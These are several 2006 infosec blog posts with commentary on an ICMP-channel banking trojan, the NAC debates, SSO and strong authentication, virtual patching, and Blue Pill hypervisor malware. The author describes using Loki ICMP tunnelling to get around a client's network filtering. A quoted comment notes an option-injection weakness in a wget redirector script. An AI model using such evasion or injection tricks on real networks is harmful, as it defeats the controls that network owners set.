ICMP = Internet Compromise Malware Protocol…the end is near!

August 9th, 2006 5 comments

Tinhat
Bear with me here as I admire the sheer elegance and simplicity of what this latest piece of malware uses as its covert back channel: ICMP.  I know…nothing fancy, but that’s why I think its simplicity underscores the bigger problem we have in securing this messy mash-up of Internet connected chewy goodness.

When you think about it, even the dopiest of users knows that when they experience some sort of abnormal network access issue, they can just open their DOS (pun intended) command prompt and type "ping…" and then call the helpdesk when they don’t get the obligatory ‘pong’ response.

It’s a really useful little protocol. Good for all sorts of things like out-of-band notifications for network connectivity, unreachable services and even quenching of overly-anxious network hosts. 

Network/security admins like it because it makes troubleshooting easy
and it actually forms some of the glue and crutches that folks depend
upon (unfortunately) to keep their networks running…

It’s had its fair share of negative press, sure. But who amongst us hasn’t?  I mean, Smurfs are cute and cuddly, so how can you blame poor old ICMP for merely transporting them?  Ping of Death?  That’s just not nice!  Nuke Attacks!?  Floods!?

Really, now.  Aren’t we being a bit harsh?  Consider the utility of it all..here’s a great example:

When I used to go onsite for customer engagements, my webmail access/POP-3/IMAP and SMTP access was filtered. Outbound SSH and other types of port filtering were also usually blocked but my old friend ICMP was always there for me…so I tunneled my mail over ICMP using Loki and it worked great..and it always worked because ICMP was ALWAYS open.  Now, today’s IDS/IPS combos usually detect these sorts of tunelling activities, so some of the fun is over.

The annoying thing is that there is really no reason why the entire range of ICMP types need to be open and it’s not that difficult to mitigate the risk, but people don’t because they officially belong to the LBNaSOAC (Lazy Bastard Network and Security Operators and Administrators Consortium.)

However, back to the topic @ hand.  I was admiring the simplicity of this newly-found data-stealer trojan that installs itself as an Internet Exploder (IE) browser helper and ultimately captures keystrokes and screen images when accessing certain banking sites and communicates back to the criminal operators using ICMP and a basic XOR encryption scheme.  You can read about it here.

It’s a cool design.  Right wrong or indifferent, you have to admire the creativity and ubiquity of the back channel…until, of course, you are compromised.

There are so many opportunities for the creative uses of taken-for-granted infrastructure and supporting communication protocols to suggest that this is going to be one hairy, protracted battle.

Submit your vote for the most "clever" use of common protocols/applications for this sort of thing…

Chris

NAC Attack: Why NAC doesn’t work and SN(i)F doesn’t, either…alone

August 7th, 2006 12 comments

Hearnospeakno
I have to admit that when I read Alan Shimel’s blog entry whereby he calls out Richard Stiennon on his blog entries titled "Don’t Bother with NAC" and "Network Admission Control is a Blind Alley," I started licking my chops as I couldn’t wait to jump in and take some time to throw fuel on the fire.  Of course, Mike Rothman already did that, but my goal in life is to be more inflammatory than he is, so let the dousing begin!

I’ve actually been meaning to ask for clarification on some points from both of these fellas, so no better time than the present. 

Now, given the fact that I know all of the usual suspects in this
debate, it’s odd that I’m actually not siding with any of them.  In
fact, I sit squarely in the middle because I think that in the same
breath both Richard and Alan are as wrong as they are right.  Mike is always right (in his own mind) but rather than suggest there was a KO here, let’s review the tape and analyze the count before we go to the scorecards for a decision.

This bout is under the jurisdiction of and sanctioned by the Nevada
Gaming Commission and brought to you by FUD — the offical supplier of
facts on the Internet. ๐Ÿ˜‰

Tale of the tape:

Richard Stiennon:

  1. Richard Stiennon highlighted some of Ofir Arkin’s NAC "weaknesses" presented at Black Hat and suggests that NAC is a waste of time based upon not only these technical deficiencies but also that the problems that NAC seeks to solve are already ameliorated by proper patching as machines "…that are patched do not get infected."
  2. Somewhat confusingly he follows on with the statement based upon the previous statement that "The fear of the zero-day worm or virus has
    proved ungrounded. And besides, if it is zero-day, then having the
    latest DAT file from Symantec does you no good."
  3. Richard suggests that integrating host-based and network-based security
    is a bad idea and that the right thing to do is based upon  "de-coupling network and host-based security. Rather than require them to work together let them work alone."
  4. Ultimately he expects that the rest of the problems will be fixed with a paradigm which he has called Secure Network Fabric. 
  5. Richard says the right solution is the concept he calls "Secure Network Fabric (SNF)" wherein "…network security
    solutions will not require switches, routers, laptops, servers,
    and vendors to work in concert with each other" but rather "…relies most heavily
    on a switched network architecture [which] usually involve[s] core switches
    as well as access switches."
  6. SNF relies on the VLANs that "…would be used to provide granularity
    down to the device-level where needed. The switch enforces policy based
    on layer 2 and 3 information. It is directed by the NetFlow based
    behavior monitoring system.
  7. Richard has talked about the need for integrating intelligent IDP (Intrusion Detection and Prevention) systems coupled with NBA/NBAD (Network Behavioral Analysis/Network Behavioral Anomaly Detection) and switching fabric for quite some time and this integration is key in SNF functionality.
  8. Furthermore, Richard maintains that relying on the endpoint to report its health back to the network and the mechanisms designed to allow admission is a bad idea and unnecessary.
  9. Richard maintains that there is a difference between "Admission Control" and "Access Control" and sums it up thusly: "To keep it simple just remember: Access Control, good. Admission Control, bad."

Alan Shimel:

  1. Alan freely admits that there are some technical "issues" with NAC such as implementation concerns with DHCP, static IP addresses, spoofed MAC addresses, NAT, etc.
  2. Alan points out that Richard did not mention that Ofir Arkin also suggests that utilizing a NAC solution based upon 802.1x is actually a robust solution.
  3. Alan alludes to the fact that people deploy NAC for various reasons and (quoting from a prior article) "…an important point is that NAC is not really geared towards stopping the determined hacker, but rather the inadvertant polluter."  Hence I believe he’s saying that 802.1x is the right NAC solution to use if you can as it solves both problems, but that if latter is not your reason for deploying NAC, then the other issues are not as important.
  4. Alan points to the fact that many of Richard’s references are quite dated (such as the comments describing the 2003 acquisition of TippingPoint by 3Com as "recent" and that ultimately SNF is a soapbox upon which Richard can preach his dislike of NAC based upon "…trusting the endpoint to report its health."
  5. De-coupling network and host-based endpoint security is a bad idea, according to Alan, because you miss context and introduce/reinforce the information silos that exist today rather than allow for coordinated, consolidated and correlated security decisions to be made.
  6. Alan wishes to purchase Pot (unless it’s something better) from Richard and go for a long walk on the shore because Mr. Stiennon has "the good stuff" in his opinion since Richard intimates that patching and configuration management have worked well and that zero-day attacks are a non-entity.
  7. Alan suggests that the technology "…we used to call behvior based IPS’s" which will pass "…to the switch to enfore policy" is ultimately "another failed technology" and that the vendors Richard cites in his BAIPS example (Arbor, Mazu, etc.) are all "…struggling in search of a solution for the technology they have developed."
  8. Alan maintains that the SNF "dream" lacks the ability to deliver any time soon because by de-coupling host and network security, you are hamstrung by the lack of "…context, analytics and network performance."
  9. Finally, Alan is unclear on the difference between Network Access Control (good) and Network Admission Control (bad.)

So again, I maintain that they are both right and both wrong.  I am the Switzerland of NAC/SNF! 

I’ll tell you why — not in any particular order or with a particular slant…

(the bout has now turned from a boxing context to a three man Mixed-Martial-Arts Octagon cage-match!  I predict a first round submission via tap-out):

  1. Firstly, endpoint and network security MUST be deployed together and ultimately communicate with one another to ultimately effect the most visible, transparent, collaborative and robust defense-in-depth security strategy available.  Nobody said it’s a 50/50 percentage, but having one without the other is silly.  There are things on endpoints that you can’t discover over a network.  Not having some intelligence about the endpoint means the network cannot possibly determine as accurately the "intent" of the packets spewing from it.
  2. Network Admission Control solutions don’t necessarily blindly trust the endpoint — whether agent or agentless, the NAC controller takes not only what the host "reports" but also how it "responds" to active probes of its state.  While virtualization and covert rootkits have the capability to potentially hide from these probes, suggesting that an endpoint passes these tests does not mean that the endpoint is no longer subject to any other control on the network…
  3. Once Network Admission Control is accomplished, Network Access Control can be applied (continuously) based upon policy and behavioral analysis/behavioral anomaly detection.
  4. Patching doesn’t work — not because the verb is dysfunctional — but because the people who are responsible for implementing it are.  So long as these systems are not completely automated, we’re at risk.
  5. Zero day exploits are not overblown — they’re getting more surgically targeted and the remediation cycles are too long.  Network-based solutions alone cannot protect against anomalies that are not protocol or exploit/vulnerability signature driven…if the traffic patterns are not abnormal, the flags are OK and the content seemingly benign going to something "normal," it *will* hit the target.
  6. You’ll be suprised just how immature many of the largest networks on this planet are in terms of segmentation via VLANs and internal security…FLAT, FLAT, FLAT.  Scary stuff.  If you think the network "understands" the data that is transported over it or can magically determine what is more important by asset/risk relevance, I too would like some of that stuff you’re smoking.
  7. Relying on the SNF concept wherein the "switch enforces policy based
    on layer 2 and 3 information," and "is directed by the NetFlow based
    behavior monitoring system" is wholly shortsighted.  Firstly layer 2/3 information is incredibly limited since most of the attacks today are application-level attacks and NOT L2/L3 and Netflow data (even v9) is grossly coarse and doesn’t provide the context needed to effectively determine these sorts of incursions.  That’s why NetFlow today is mostly used in DDoS activities — because you see egregiously spiked usage and/or traffic patterns.  It’s a colander not a sieve.
  8. Most vendors today are indeed combining IDP functionality with NBA/D to give a much deeper and contextual awareness across the network.  More importantly, big players such as ISS and Cisco include endpoint security and NAC (both "versions") to more granularly define, isolate and ameliorate attacks.  It’s not perfect, but it’s getting better.
  9. Advances in BA/NBA/NBAD are coming (they’re here, actually) and it will produce profound new ways of managing context and actionable intelligence when combined with optimized compute and forwarding engines which are emerging at the same time.   They will begin, when paired with network-wide correlation tools, to solve the holy trinity of issues: context, analytics and performance.
  10. Furthermore, companies such as ISS and StillSecure (Alan’s company) have partnered with switch vendors to actually do just what Richard suggests in concept.  Interestingly enough,
    despite the new moniker, the SNF concept is not new — Cisco’s SDN (albeit
    without NAC) heavily leverages the concepts described above from an
    embedded security perspective and overlay security vendors such as ISS
    and Crossbeam also have solutions (in POC or available) in this area.
  11. Let’s be honest, just like the BA vendors Alan described, NAC is in just the same position — "struggling in search of a solution for the technology they have developed."  There are many reasons for deploying NAC: Pre and Post-inspection/Quarantine/Remediation and there are numerous ways of doing it: agent-based/agentless/in-line/out-of-band… The scary thing is with so many vendors jumping in here and the 800 pound Gorilla (Cisco) even having trouble figuring it out, how long before NAC becomes a feature and not a market?  Spending a bunch of money on a solution (even without potential forklifts) to not "… stop the determined hacker, but rather the inadvertant polluter" seems a little odd to me.  Sure it’s part of a well defined network strategy, but it ain’t all that yet, either.
  12. With Cisco’s CSO saying things like "The concept of having devices join a network in which they are posture-assessed and given access to the network in a granular way is still in its infancy" and even StillSecure’s CTO (Mitchell Ashley) saying "…but I think those interested in NAC today are really trying to avoid infection spread by an unsuspecting network user rather than a knowledgeable intruder" it’s difficult to see how NAC can be considered a core element of a network security strategy WITHOUT something like SNF.

So, they’re both right and both wrong.  Oh, and by the way, Enterprise and Provider-class UTM solutions are combining ALL of this in a unified security service layer… FW, IDP, Anti-X, NBA(D) and SNF-like foundations.

[Tap before it breaks, boys!]

We need NAC and we need SNF and I’ve got the answer:

  1. Take some of Richard’s "good stuff"
  2. Puff, puff, pass
  3. Combine some of Alan’s NAC with Richard’s SNF
  4. Stir
  5. Bake for 30 minutes and you have one F’N (good) SNAC
    (it’s an anagram, get it!)

There you have it.

Chris

The Most Hysterical “Security by Obscurity” Example, Evah!

August 4th, 2006 No comments

Upsidedownebay
For those of you living under a rock for the last 15+ years, you may not have heard of Bruce Schneier.  He’s a brilliantly opinionated cryptographer, privacy advocate, security researcher, businessman, author and inadvertent mentor to many.  I don’t agree with everything he says, but I like the buttons he pushes.

I love reading his blog because his coverage of the issues today are diverse and profound and very much carry forth the flavor of his convictions.  Also, it seems Bruce really likes Squids…which makes this electronically-enabled Cepholopod-inspired security post regarding the theft of someone’s wireless connection that much more funny.

Here’s the gist: A guy finds that his neighbor is "stealing" his wireless Internet access.  Rather than just secure it he "…"runs squid with a trivial redirector that downloads images, uses
mogrify to turn them upside down and serves them out of it’s local
webserver."  Talk about security by obscurity!

That’s just f’in funny…so much so, I’m going to copy his idea, just like I did Bruce’s blog entry! ๐Ÿ˜‰

Actually the best part is the comment from one "Matthew Skala" who performs an autopsy on the clearly insecure and potentially dangerous implementation of the scripts and potential for "…interesting results."  He’s just sayin’…

I don’t know all the details of how Squid interfaces to redirection
scripts, but I see that that redirection script passes the URL to wget
via a command line parameter without using "–" to terminate option
processing. It first parses out what’s supposed to be the URL using a
regular expression, but not a very cautious one. I wonder if it might
be possible to request a carefully-designed URL that would cause wget
to misbehave by interpreting the URL as an option instead of a URL. I
also see that it’s recognizing images solely by filename, so I wonder
if requesting a URL named like an image but that *wasn’t* an image,
could cause interesting results. Furthermore, it writes the images to
disk before flipping them – and I don’t even see any provision for
clearing out the cache of flipped images – so requesting a lot of very
large images, or images someone wouldn’t want to be caught possessing,
might be interesting.

Posted by: Matthew Skala  at August  4, 2006 08:42 AM

Read the whole thing (with configs.) here.

Chris

Categories: General Rants & Raves Tags:

More debate on SSO/Authentication

August 2nd, 2006 1 comment

Mike Farnum and I continue to debate the merits of single-sign-on and his opinion that deploying same makes you more secure. 

Rothman’s stirring the point saying this is a cat fight.  To me, it’s just two dudes having a reasonable debate…unless  you know something I don’t [but thanks, Mike R. because nobody would ever read my crap unless you linked to it! ;)]

Mike’s position is that SSO does make you more secure and when combined with multi-factor authentication adds to defense-in-depth.   

It’s the first part I have a problem with, not so much the second and I figured out why.  It’s the order of the things that got me bugged when Mike said the following:

But hereโ€™s s [a] caveat, no matter which way you go: you really need a
single-signon solution backing up a multi-factor authentication
implementation.
 

If he had suggested that multi-factor authentication should back up an SSO solution, I’d agree.  But he didn’t and he continues not to by maintaing (I think) that SSO itself is secure and SSO + multi-factor authentication is more secure.

My opinion is a little different.  I believe that strong authentication *does* add to defense-in-depth, but SSO adds only depth of complexity, obfuscation and more moving parts, but with a single password on the front end.  More on that in a minute.

Let me clarify a point which is that I think from a BUSINESS and USER EXPERIENCE perspective, SSO is a fantastic idea.  However, I still maintain that SSO by itself does not add to defense-in-depth (just the opposite, actually) and does not, quantifiably, make you more "secure."  SSO is about convenience, ease of use and streamlined efficiency.

You may cut down on password resets, sure.  If someone locks themselves out, however, most of the time resets/unlocks involve then self-service portals or telephone resets which are just as prone to brute force and social engineering as calling the helpdesk, but that’s a generalization and I would rather argue through analogy… ๐Ÿ˜‰

Here’s the sticky part of why I think SSO does not make you more secure, it merely transfers the risks involved with passwords from one compartment to the next. 

While that’s a valid option, it is *very* important to recognize that managing risk does not, by definition, make you more secure…sometimes managing risk means you accept or transfer it.  It doesn’t mean you’ve solved the problem, just acknowledged it and chosen to accept the fact that the impact does not justify the cost involed in mitigating it. ๐Ÿ˜‰

SSO just says "passwords are a pain in the ass to manage. I’m going to find a better solution for managing them that makes my life easier."  SSO Vendors claim it makes you more secure, but these systems can get very complex when implementing them across an Enterprise with 200 applications, multiple user repositories and the need to integrate or federate identities and it becomes difficult to quantify how much more secure you really are with all of these moving parts.

Again, SSO adds depth (of complexity, obfuscation and more moving parts) but with a single password on the front end.  Complex passwords on the back-end managed by the SSO system don’t do you a damned good when some monkey writes that single password that unlocks the entire enterprise down on a sticky note.

Let’s take the fancy "SSO" title out of the mix for a second and consder today’s Active Directory/LDAP proxy functions which more and more applications tie into.  This relies on a single password via your domain credentials to authenticate directly to an application.  This is a form of SSO, and the reality is that all we’re doing when adding on an SSO system is supporting web and legacy applications that can’t use AD and proxying that function through SSO.

It’s the same problem all over again except now you’ve just got an uber:proxy.

Now, if you separate SSO from the multi-factor/strong authentication argument, I will agree that strong authentication (not necessarily multi-factor — read George Ou’s blog) helps mitigate some of the password issue, but they are mutually exclusive.

Maybe we’re really saying the same thing, but I can’t tell.

Just to show how fair and balanced I am (ha!) I will let you know that prior to leaving my last employ, I was about to deploy an Enterprise-wide SSO solution.  The reason?  Convenience and cost.

Transference of risk from the AD password policies to the SSO vendor’s and transparency of process and metrics collection for justifying more heads.    It wasn’t going to make us any more secure, but would make the users and the helpdesk happy and let us go figure out how we were going to integrate strong authentication to make the damned thing secure.

Chris

On two-factor authentication and Single-Sign-On…

August 1st, 2006 2 comments

Computer_key1_1
I’ve been following with some hand-wringing the on-going debates regarding the value of two-factor and strong authentication systems in addition to, or supplementing, traditional passwords.

I am very intent on seeing where the use cases that best fit strong authentication ultimately surface in the long term.  We’ve seen where they are used today, but Icub wonder if we, in the U.S., will ever be able to satisfy the privacy concerns raised by something like a smart-card-based national ID system to recognize the benefits of this technology. 

Today, we see multi-factor authentication utilized for:  Remote-access VPN, disk encryption, federated/authenticated/encrypted identity management and access control, the convergence of physical and logical/information security…

[Editor’s Note: George Ou from ZDNet just posted a really intersting article on his blog relating how banks are "…cheating their way to [FFIEC] web security guidelines" by just using multiple instances of "something the user knows" and passing it off as "multifactor authentication."  His argument regarding multi-factor (supplemental) vs. strong authentication is also very interesting.]

I’ve owned/implemented/sold/evaluated/purchased every kind of two-factor / extended-factor / strong authentication system you can think of:

  • Tokens
  • SMS Messaging back to phones
  • Turing/image fuzzing
  • Smart Cards
  • RFID
  • Proximity
  • Biometrics
  • Passmark-like systems

…and there’s very little consistency in how they are deployed, managed and maintained.  Those pesky little users always seemed to screw something up…and it usually involved losing something, washing something, flushing something or forgetting something.

The technology’s great, but like Chandler Howell says there are a lot of issues that need reconsideration when it comes to their implementation that go well beyond what we think of today as simply the tenents of "strong" authentication and the models of trust we surround them with:

So here are some Real World goals I suggest we should be looking at.

  1. Improved authentication should focus on (cryptographically) strong
    Mutual Authentication, not just improved assertion of user Identity.
    This may mean shifts in protocols, it may mean new technology. Those
    are implementation details at this level.
  2. We need to break the relationship between location & security
    assumption, including authentication. Do we need to find a replacement
    for โ€œsomewhere you are?โ€ And if so, is it another authentication factor?
  3. How does improved authentication get protection closer to the data?
    Weโ€™re still debating types of deadbolts for our screen door rather than
    answering this question.

All really good points, and ones that I think we’re just at the tip of discussing. 

Taking these first steps is an ugly and painful experience usually, and I’d say that the first footprints planted along this continuum do belong to the token authentication models of today.  They don’t work for every application and there’s a lack of cross-pollinization when you use one vendor’s token solution and wish to authenticate across boundaries (this is what OATH tries to solve.)

For some reaon, people tend to evaluate solutions and technology in a very discrete and binary modality: either it’s the "end-all, be-all, silver bullet" or it’s a complete failure.  It’s quite an odd assertion really, but I suppose folks always try to corral security into absolutes instead of relativity.

That explains a lot.

At any rate, there’s no reason to re-hash the fact that passwords suck and that two-factor authentication can provide challenges, because I’m not going to add any value there.  We all understand the problem.  It’s incomplete and it’s not the only answer. 

Defense in depth (or should it be wide and narrow?) is important and any DID strategy of today includes the use of some form of strong authentication — from the bowels of the Enterprise to the eCommerce applications used in finance — driven by perceived market need, "better security," regulations, or enhanced privacy.

However, I did read something on Michael Farnum’s blog here that disturbed me a little.  In his blog, Michael discusses the pros/cons of passwords and two-factor authentication and goes on to introduce another element in the Identity Management, Authentication and Access Control space: Single-Sign-On.

Michael states:

But hereโ€™s s [a] caveat, no matter which way you go: you really need a
single-signon solution backing up a multi-factor authentication
implementation.
  This scenario seems to make a lot of sense for a few
reasons:

  • It eases the administrative burdens for the IT department because,
    if implemented correctly, your password reset burden should go down to
    almost nil
  • It eases (possibly almost eliminates) password complaints and written down passwords
  • It has the bonus of actually easing the login process to the network and the applications

I know it is not the end-all-be-all, but multi-factor authentication
is definitely a strong layer in your defenses.  Think about it.

Okay, so I’ve thought about it and playing Devil’s Advocate, I have concluded that my answer is: "Why?"

How does Single-Sign-On contribute to defense-in-depth (besides adding another hyphenated industry slang) short of lending itself to convenience for the user and the help desk.  Security is usually 1/convenience, so by that algorithm it doesn’t.

Now instead of writing down 10 passwords, the users only need one sticky — they’ll write that one down too!

Does SSO make you more secure?  I’d argue that in fact it does not — not now that the user has a singular login to every resource on the network via one password. 

Yes, we can shore that up with a strong-authentication solution, and that’s a good idea, but I maintain that SA and SSO are mutually exclusive and not a must.  The complexity of these systems can be mind boggling, especially when you consider the types of priviledges these mechanisms often require in order to reconcile this ubiquitous access.  It becomes another attack surface.

There’s a LOT of "kludging" that often goes on with these SSO systems in order to support web and legacy applications and in many cases, there’s no direct link between the SSO system, the authentication mechanism/database/directory and ultimately the control(s) protecting as close to the data as you can.

This cumbersome process still relies on the underlying OS functionality and some additional add-ons to mate the authentication piece with the access control piece with the encryption piece with the DRM piece…

Yet I digress.

I’d like to see the RISKS of SSO presented along with the benefits if we’re going to consider the realities of the scenario in terms of this discussion.

That being said, just because it’s not the "end-all-be-all" (what the hell is with all these hyphens!?) doesn’t mean it’s not helpful… ๐Ÿ˜‰

Chris

 

Retrospect: The “Morning After Pill for Patch Tuesday”

August 1st, 2006 1 comment

Chill_1
I dredged this post up from my prior blog because I think it’s interesting and relevant today given the current state of vulnerability management and patching.  I wrote this entry almost a year ago on 9/15/05, and I thought I’d bring it back to life here.

The post describes an alternative to the frenzied activities of Patch Tuesday and dovetails on what has become the raging debate of third party patches.  That being said, I don’t think there’s any excuse for crappy code, but today’s realities mean that despite tools like firewalls (even app. level,) NBAD, and IPS, we still have to patch — one way or another.

My motto is work smarter, not harder and I think Blue Lane’s product allows one to do just that.  It helps you manage risk by buying time — and in some cases by patching what is otherwise unpatchable.

I want to bring to light an issue that was raised by Mike Rothman: is the "patch proxy" concept fab or fad?  Market or function?  One could argue that ultimately IPS vendors will provide this functionality in their products.  However, today, IPS products do one of two things:  Allow or Drop. 

I’m not going to argue the "market or function" question, because that’s not the point of this post.

Blue Lane’s PatchPoint provides in-stream remediation at the network layer — the same remediation you’d get on the actual host but without having to touch it until you’ve regression tested the box.  So the product isn’t solely "Intrusion Detection" nor is it solely "Intrusion Prevention" — I like to call it "Intrusion Correction."

When I wrote this, I was one of Blue Lane’s first customers and their technology really proved itself quite well and worked very nicely as a L2 insertion with the rest of the layers of security we already had in place.  It allowed us to make rational decisions about how, when and why we patched so as not to incurr more risk in hasty patching than the exploit might do harm should it hit.

Unfortunately I can’t pull the comments section that went with it as I had a great exchange with Dominick White on why this wasn’t just like "…every other IPS product."  Honestly, in hindsight I would go back and clarify a few points, but perhaps the post in it’s original form will provoke just as many comments/questions as it did before.

Chris

September 15, 2005

About two years ago as I was malcontently slumped over another batch of
vulerabilities which required patches to remediate, it occured to me
that even in light of good vulnerability management tools to prioritize
vulnerabilities and patching efforts as well as tools to deploy them,
the fact that I had to do either in a short period of time, well, stunk.

Patch
too early without proper regression testing and business impact
analysis and you can blow an asset sky high. Downtime resulting from
"Patches Gone Wild" can result in more risk than potentially not
patching at all depending upon whether the exploit is in the wild and
the criticality of the vulnerability.

It was then that a VC
contact turned me on to a company (who at the time was still in stealth
mode at the time) – Blue Lane Technologies – who proposed a better way
to patch.

Namely, instead of patching the servers reactively
without testing, why not patch the "network" instead and apply the same
countermeasures to the streams as the patches do to the servers?

Assuming
all other things such as latency and resiliency are even, this would be
an excellent foothold in the battle to actually patch less while still
patching rationally! You would buy yourself the time to test and plan
and THEN deploy the actual server patch on your own schedule.

Guess what?  It works.  Very well.

We
started testing a couple of months ago and threw all sorts of nastiness
at the solution. It sits in-line in front of servers (with NIC-card
failover capabilities, thankyouverymuch) and works by applying
ActiveFix patches to the network streams in real time. We took a test
box behind the protected interface and had multiple VMWare instances of
various Microsoft OS’s and applications running. We hit it with all
sorts of fun VA scanners, exploit tools and the like. Of course, the
"boxes" were owned. We especially liked toying with MetaSploit since it
allowed us to really play with payloads.

We "applied" the
patches to the machine instances behind the PatchPoint Gateway. Zip.
Nada. We couldn’t exploit a damned thing. It was impressive.

"Ah,"
you say, "but any old NIPS/HIPS/AV/Firewall can do that!" Er, not so,
Sparky. The notion here is that rather than simply dump an entire
session, the actual active streams are "corrected" allowing good
traffic to flow while preventing "bad" traffic from getting through —
on a per flow basis. It doesn’t just send a RST and that $50M wire
transfer to /dev/null, it actually allows legitimate business traffic
to continue unimpeded.

The approach is alarmingly, well, so 20 years ago!  Remember application proxy firewalls?

Well,
if you think about how an FTP proxy works, one defines which "good"
commands may be executed and anything else is merely ignored. A user
could connect via FTP and type "delete" to his heart’s content, but if
"delete" was not allowed, the proxy would simply discard the requested
command and never pass it on to the server. Your session was still up,
you could continue to use FTP, you just could not "delete."

Makes sense, no?

If,
for example, Microsoft’s MS05-1,000,000 patch for, say, IIS was
designed to remediate a buffer overflow vulnerability which truncated
the POSTS to 1024 bytes, then that’s exactly what Blue Lane’s
PatchPoint would do. If it *does* (on the odd chance) do something
nasty to your application, you can simply "un-apply" the patch which
takes about 10 seconds and you’re in no worse shape than you were in
the first place…

It’s an excellent solution that further adds
to reducing our risks associated with patching for a price point that
is easily justified given both the soft-cost cost avoidance issues
associated with patch deployment and the very real costs of potential
downtime associated with patch installation failures.

Other
manufacturers are rumored to be offering this virtual patching
capability in their "deux ex machina" solutions, but I dare say that I
have yet to see a more flexible, accurate and simple deployment than
Blue Lane’s. In fact, I’ve yet to see anyone promise to deliver the
fixes in the timeframe that Blue Lane does.

I give it the "It Kicks Ass" Award of the week.

See Blue Lane Technologies for a far better explanation than this one.

The product provides (now) virtual patching for Microsoft, Oracle, Sun, Unix and Linux.  Sure would be nice not to have to apply 65 patches to your most critical Oracle databases every quarter…

I am certain that elements of this entry will require additional explanation and I hope we can discuss them here as this is really a very well-focused product offering that does a great job without boiling the ocean.

Chris

Categories: Patch Management Tags:

100% Undetectable Malware (?)

July 23rd, 2006 No comments

Bluepillmini
I know I’m checking in late on this story, but for some reason, it just escaped my radar a month or so ago when it appeared…I think that within the context of some of the virtualization discussions in the security realm that it was interesting enough to visit. 

Joanna Rutkowska, a security researcher for Singapore-based IT security firm COSEINC, posts on her Invisible Things blog some amazingly ingenious and frightening glimpses into the possibilities and security implications in terms of malware offered up by the virtualization technologies in AMD’s SVM (Secure Virtual machine)/Pacifica technology.* 

Joanna’s really talking about exploiting the virtualization capabilities of technology like Pacifica to apply stealth by moving the entire operating system into the virtualization layer (in memory — AKA "the matrix.")  If the malware itself controls the virtualization layer, then the "reality" of what is "good" versus "bad" (and detectable as such) is governed within the context of the malware itself.  You can’t detect "bad" via security mechanisms because it’s simply not an available option for the security mechanisms to do so.  Ouch.

This is not quite the same concept that we’ve seen thus far in more "traditional" (?) VM rootkits which load VMM’s below the OS level by exploiting a known vulnerability first.  With Blue Pill, you don’t *need* a vulnerability to exploit.  You should check out this story for more information on this topic such as SubVirt as described on eWeek.

Here is an excerpt from Joanna’s postings thus far:

"Now, imagine a malware (e.g. a network backdoor, keylogger, etc…)
whose capabilities to remain undetectable do not rely on obscurity of
the concept. Malware, which could not be detected even though its
algorithm (concept) is publicly known. Let’s go further and imagine
that even its code could be made public, but still there would be no
way for detecting that this creature is running on our machines…"

"The idea behind Blue Pill is simple: your operating system swallows the
Blue Pill and it awakes inside the Matrix controlled by the ultra thin
Blue Pill hypervisor. This all happens on-the-fly (i.e. without
restarting the system) and there is no performance penalty and all the
devices, like graphics card, are fully accessible to the operating
system, which is now executing inside virtual machine. This is all
possible thanks to the latest virtualization technology from AMD called
SVM/Pacifica."

Intrigued yet? 

This story (once I started researching) was originally commented on by Bill Brenner from techtarget, but I had not seen it until now.  Bill does an excellent job in laying out some of the more relevant points including highlighting the comparisons to the subvirt rootkit as well as some counterpoints aruged from the other side.  That last hyperlink to Kurt Wismer’s blog is just as interesting.  I love the last statement he makes:

"if undetectable virtualization technology can be used to hide the
presence of malware, then equally undetectable virtualization
technology pre-emptively deployed on the system should be able to
detect the undetectable vm-based stealth malware if/when it is encountered…

Alas, I was booked to attend Black Hat in August but my priorities have
been re-clocked, so unfortunately I will not be able to attend Joanna’s
presentation where she is demonstrating her functional prototype of Blue Pill.

I’ve submitted that the notion of virtualization is one of the reasons that embedding more and more security as an embedded function within the "network" as a single pane of glass into the total situational awareness from a security perspective is a flawed proposition as more and more of the "network" will become virtualized within the VM constructs themselves. 

I met with some of Microsoft’s security architects on this very topic and we stared intently at one another hoping for suggestions that would allow us to plan today for what will surely become a more frightening tomorrow.

I’m going to post about this shortly.

Happy reading.  There’s not much light in the rabbit hole, however.

*Here’s a comparison of the Intel/AMD approach to virtualization, including SVM.

Categories: Malware Tags:

Risk Management Requires Sophistication?

July 18th, 2006 2 comments

Excuses
Mike Rothman commented today on another of Michael Farnum’s excellent series on being an "effective security manager."   

Mike R. starts of well enough in defining the value-prop of "Risk Management" as opposed to managing threats and vulnerabilities, and goes on to rightfully suggest that in order to manage risk you need to have a "value component" as part of the weighting metrics for decision making…all good stuff:

But more importantly, you need to get a feel for the RELATIVE value of
stuff (is the finance system more important than the customer
management) before you can figure out where you should be spending your
time and money.

It goes without saying that it’s probably a good idea (and an over-used cliche) that it doesn’t make much sense to spend $100,000 to protect a $100 asset, but strangely enough, that’s what a lot of folks do…and they call it "defense in depth." 

Before you lump me into one of Michael F’s camps, no, I am not saying defense in depth is an invalid and wasteful strategy.  I *am* saying that people hide behind this term because they use it as a substitute for common sense and risk-focused information protection and assurance...

…back to the point at hand…

Here’s where it gets ugly as the conclusion of Mike R’s comments set me
off a little because it really does summarize one of the biggest
cop-outs in the management and execution of information protection/security today:

That is not a technique for the unsophisticated or
those without significant political mojo. If you are new to the space,
you are best off initially focusing on the stuff within your control,
like defense in depth and security awareness.

This is a bullshit lay-down.  It does not take any amount of sophistication to perform a business-driven risk-assessment in order to support a risk-management framework that communicates an organization’s risk posture and investment in controls to the folks that matter and can do something about it. 

It takes a desire to do the right thing for the right reason that protects that right asset at the right price point.  Right?

While it’s true that most good IT folks inherently understand what’s important to an organization from an infrastructure perspective, they may not be able to understand why or be able to provide a transparent explanation as to what impacts based upon threats and exposed attack surfaces really mean to the BUSINESS.

You know how you overcome that shortfall?  You pick a business and asset-focused risk assessment framework and  you start educating yourself and your company on how, what and why you do what you do; you provide transparency in terms of function, ownership, responsibility, effectiveness, and budget.  These are metrics that count.

Don’t think you can do that because you don’t have a fancy title, a corner office or aren’t empowered to do so?  Go get another job because you’re not doing your current one any justice.

Want a great framework that is well-suited to this description and is a good starting point for both small and large companies?  Try Carnegie-Mellon’s OCTAVE.  Read the book.  Here’s a quick summary:

For an organization that wants to understand its information security
needs, OCTAVEยฎ (Operationally Critical Threat, Asset, and
Vulnerability EvaluationSM) is a risk-based strategic assessment
and planning technique for security.

OCTAVE is self-directed. A small team of people from the operational (or
business) units and the IT department work together to address the security
needs of the organization.  The team draws on the knowledge of many employees to
define the current state of security, identify risks to critical assets, and
set a security strategy.

OCTAVE is flexible. It can be tailored for most organizations. 

OCTAVE is different from typical technology-focused assessments. It focuses
on organizational risk and strategic, practice-related issues, balancing operational
risk, security practices, and technology.

